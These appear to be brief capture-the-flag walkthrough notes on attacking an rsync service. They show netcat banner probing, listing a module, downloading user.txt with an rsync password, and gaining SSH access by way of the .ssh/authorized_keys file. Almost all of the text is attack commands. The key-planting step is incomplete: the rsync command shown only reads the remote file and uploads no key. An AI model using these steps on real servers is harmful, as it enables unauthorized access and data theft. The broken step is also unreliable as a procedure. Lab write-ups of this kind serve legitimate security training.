=======================connecting to Rsync :
>>> nc -vn $IP 873
(UNKNOWN) [] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
files <--- The server starts enumerating
@RSYNCD: EXIT <--- Sever closes the connection
=====================After Gettin First File name :
>>> rsync rsync://rsync-connect@$IP/files/
Password: <Enter the rsync pass>
<Some Directory Listings>
>>> rsync rsync://rsync-connect@$IP/files/sys-internal/user.txt .
<this will cp the user.txt file to your $pwd>
======================Gianing the SSH Access :
>>> ssh-keygen
>>> rsync -av rsync://rsync-connect@$IP/files/sys-internal/.ssh/authorized_keys
>>> ssh -i id_rsa sys-internal@$IP
Last updated